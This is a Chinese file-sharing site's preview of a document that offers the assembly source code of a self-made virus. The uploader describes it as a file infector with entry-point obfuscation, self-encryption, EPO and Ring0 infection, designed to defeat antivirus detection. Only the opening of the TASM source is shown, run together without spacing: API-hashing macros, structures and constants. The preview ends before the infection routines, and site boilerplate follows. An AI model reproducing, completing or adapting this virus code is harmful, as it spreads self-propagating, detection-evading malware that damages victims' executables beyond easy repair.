返回
一款病毒的汇编源代码.docx

一款病毒的汇编源代码.docx

ID:51804566

大小:42.89 KB

页数:31页

时间:2020-03-16

一款病毒的汇编源代码.docx_第1页
一款病毒的汇编源代码.docx_第2页
一款病毒的汇编源代码.docx_第3页
一款病毒的汇编源代码.docx_第4页
一款病毒的汇编源代码.docx_第5页
资源描述:

《一款病毒的汇编源代码.docx》由会员上传分享,免费在线阅读,更多相关内容在工程资料-天天文库

1、这篇在邪八有放过!这是一只纯ASM编写的病毒,具备文件感染,入口代码变形,自身加密,EPO等功能,是一只无任何特征码的病毒,设计目的是为对抗反病毒软件的特征码杀毒、行为杀毒和虚拟机杀毒,现有代码未提供任何破坏功能,但会主动感染可执行文件,而且被感染过的文件很难再还原,这点请注意另外这东西也提供了Ring0功能,主要用于感染运行中的可执行文件这东西写完后放了很久,不太记得怎么用了,把代码放上来有兴趣的朋友拿去研究研究,汇编工具为TASM,由于已经不确定会产生什么后果了,测试时请自行承担风险,还有不要拿去做坏事。部分代码:.486p.

2、modelflat,stdcalloptioncasemap:none;----------------------------------------------------------------------------CRC16MACROstring,lstrCRC_VALUE=0ffffffffhIRPCCRC_BYTE,lstrCRC_VALUE=CRC_VALUExor'&CRC_BYTE'REPT8CRC_VALUE=(CRC_VALUEshr1)xor((CRC_VALUEand1)*0edb88320h)ENDM

3、ENDMCRC_VALUE=CRC_VALUExor0ffffffffhdw(CRC_VALUEand0ffffh)ENDMAPIDEFMACROstring,symCRC16,symsym=vEnd+VARLEN+APICOUNTAPICOUNT=APICOUNT+6ENDMVARDEFMACROstring,sym,vwsym=VARCOUNTVARCOUNT=VARCOUNT+vwENDMLIBDEFMACROstring,sym,lstrlocall1,l2l1:dblstr,0l2:sym=LIBCOUNTLIBCOUN

4、T=LIBCOUNT+(l2-l1)ENDMpushszMACROlstrlocalpushstrcallpushstrdblstr,0pushstr:ENDMrdtscMACROdb0fh,31hENDMShowMessageMACROlstrIFDEBUGOUTPUTMESSAGE=1pushsz,lstrcallOutputMessageENDIFENDMWIN32_FIND_DATAASTRUCTdwFileAttributesDWORD?ftCreationTimeQWORD?ftLastAccessTimeQWORD?

5、ftLastWriteTimeQWORD?nFileSizeHighDWORD?nFileSizeLowDWORD?dwReserved0DWORD?dwReserved1DWORD?cFileNameBYTE260dup(?)cAlternateFileNameBYTE14dup(?)ALIGN4WIN32_FIND_DATAAENDSPROCESSENTRY32STRUCTdwSizeDWORD?cntUsageDWORD?th32ProcessIDDWORD?th32DefaultHeapIDDWORD?th32Module

6、IDDWORD?cntThreadsDWORD?th32ParentProcessIDDWORD?pcPriClassBaseDWORD?dwFlagsDWORD?szExeFileBYTE260dup(?)PROCESSENTRY32ENDS;--------------------------------------------------------DEBUG=1OUTPUTMESSAGE=0VARLEN=140hvSize=vEnd-vBeginvdelta=vEnd+80hMAX_PATH=104hVARCOUNT=0A

7、PICOUNT=0LIBCOUNT=0MainLoaderSizeequ26MiniLoaderSizeequ10FILE_WRITE_ENABLEequ00000001bRING0_CODE_ALLOWequ00000010bUSED_MINI_LOADERequ00000100bNTK_API_INITequ8NTL_API_INITequ9;****************************************************************************;全局变量结构;*********

8、*******************************************************************VARCOUNT=-80hVARDEF,var_k32base,4VARDEF,var_vbase,4VARDEF

当前文档最多预览五页,下载文档查看全文

此文档下载收益归作者所有

当前文档最多预览五页,下载文档查看全文
温馨提示:
1. 部分包含数学公式或PPT动画的文件,查看预览时可能会显示错乱或异常,文件下载后无此问题,请放心下载。
2. 本文档由用户上传,版权归属用户,天天文库负责整理代发布。如果您对本文档版权有争议请及时联系客服。
3. 下载前请仔细阅读文档内容,确认文档内容符合您的需求后进行下载,若出现内容与标题不符可向本站投诉处理。
4. 下载文档时可能由于网络波动等原因无法下载或下载错误,付费完成后未能成功下载的用户请联系客服处理。